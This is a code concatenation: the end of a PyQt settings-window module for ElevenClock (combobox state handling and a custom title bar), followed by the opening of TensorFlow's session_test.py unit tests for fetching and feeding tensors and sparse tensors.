self.combobox.lineEdit().setFont(self.combobox.itemText(i))
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.combobox.lineEdit().setFont(self.combobox.currentText())
self.stateChanged.emit(v)
def setItems(self, items: list):
self.combobox.clear()
self.combobox.addItems(items)
class QTitleBarWidget(QWidget):
def __init__(self, parent: QMainWindow = ...) -> None:
super().__init__(parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("ControlWidget")
self.oldPos = QPoint(0, 0)
self.setFixedHeight(parent.getPx(32))
self.iconMode = "white"
self.closeButton = QPushButton()
self.closeButton.setObjectName("closeButton")
self.closeButton.setIconSize(QSize(parent.getPx(14), parent.getPx(14)))
self.closeButton.setIcon(QIcon(getPath(f"cross_{self.iconMode}.png")))
self.closeButton.setFixedHeight(parent.getPx(32))
self.closeButton.setFixedWidth(parent.getPx(46))
self.closeButton.clicked.connect(parent.close)
self.maximizeButton = QPushButton()
self.maximizeButton.setObjectName("titlebarButton")
self.maximizeButton.setFixedHeight(parent.getPx(32))
self.maximizeButton.setIconSize(QSize(parent.getPx(14), parent.getPx(14)))
self.maximizeButton.setIcon(QIcon(getPath(f"maximize_{self.iconMode}.png")))
self.maximizeButton.setFixedWidth(parent.getPx(46))
self.maximizeButton.clicked.connect(lambda: parent.showNormal() if parent.isMaximized() else parent.showMaximized())
self.minimizeButton = QPushButton()
self.minimizeButton.setObjectName("titlebarButton")
self.minimizeButton.setFixedHeight(parent.getPx(32))
self.minimizeButton.setIconSize(QSize(parent.getPx(12), parent.getPx(12)))
self.minimizeButton.setIcon(QIcon(getPath(f"minimize_{self.iconMode}.png")))
self.minimizeButton.setFixedWidth(parent.getPx(46))
self.minimizeButton.clicked.connect(parent.showMinimized)
self.setLayout(QHBoxLayout())
l = QLabel(_("ElevenClock Settings"))
l.setStyleSheet("background-color: transparent;")
self.layout().addWidget(l)
self.layout().addStretch()
self.layout().setContentsMargins(16, 0, 0, 0)
self.layout().setSpacing(0)
self.layout().addWidget(self.minimizeButton)
self.layout().addWidget(self.maximizeButton)
self.layout().addWidget(self.closeButton)
if __name__ == "__main__":
import __init__
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import random
import os
import sys
import threading
import time
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as framework_device_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
# Import gradients to resolve circular imports
from tensorflow.python.ops import gradients # pylint: disable=unused-import
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
class SessionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionTest, self).setUp()
warnings.simplefilter('always')
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2, 'GPU': 0
})) as sess:
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
num_cpu_devices = 0
num_gpu_devices = 0
for device in sess.list_devices():
device_type = framework_device_lib.DeviceSpec.from_string(
device.name).device_type
if device_type == 'CPU':
num_cpu_devices += 1
elif device_type == 'GPU':
num_gpu_devices += 1
self.assertEqual(2, num_cpu_devices)
self.assertEqual(0, num_gpu_devices)
def testPerSessionThreads(self):
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config_pb = config_pb2.ConfigProto()
pool = config_pb.session_inter_op_thread_pool.add()
with session.Session(config=config_pb) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config_pb) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config_pb.session_inter_op_thread_pool) - 1)
with session.Session(config=config_pb) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
@test_util.run_v1_only('b/120545219')
def testFetchAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
val1 = np.array([1.2, 3.4, 5.6])
val2 = np.array([[1, 2], [4, 3]])
val3 = np.array([10, 20, 30])
t1 = constant_op.constant(val1)
t2 = constant_op.constant(val2)
sample = SampleAttr(t1, t2)
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val1, result.field1)
self.assertAllEqual(val2, result.field2)
result = sess.run(sample, feed_dict={sample.field1: val3})
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val3, result.field1)
self.assertAllEqual(val2, result.field2)
@test_util.run_v1_only('b/120545219')
def testFetchNestedAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field0 = attr.ib()
field1 = attr.ib()
v1 = 10
v2 = 20
v3 = np.float32(1.2)
v4 = np.float32(3.4)
v5 = np.float64(100.001)
v6 = np.float64(-23.451)
arr1 = np.array([1.2, 6.7, 3.4])
arr2 = np.array([7, 11, 3])
sample = SampleAttr(
SampleAttr(
SampleAttr(constant_op.constant(v1), constant_op.constant(v2)),
SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))),
{'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)),
'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]})
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertIsInstance(result.field0, SampleAttr)
self.assertIsInstance(result.field0.field0, SampleAttr)
self.assertIsInstance(result.field0.field1, SampleAttr)
self.assertIsInstance(result.field0.field1.field0, np.ndarray)
self.assertAllEqual(arr1, result.field0.field1.field0)
self.assertIsInstance(result.field0.field1.field1, np.ndarray)
self.assertAllEqual(arr2, result.field0.field1.field1)
self.assertIsInstance(result.field1, dict)
self.assertIn('A', result.field1)
self.assertIn('B', result.field1)
self.assertIsInstance(result.field1['A'], SampleAttr)
self.assertAllEqual(
[v3, v4],
[result.field1['A'].field0, result.field1['A'].field1])
self.assertIsInstance(result.field1['B'], list)
self.assertEqual(1, len(result.field1['B']))
self.assertIsInstance(result.field1['B'][0], SampleAttr)
self.assertAllEqual(
[v5, v6],
[result.field1['B'][0].field0, result.field1['B'][0].field1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEquals(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEquals(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
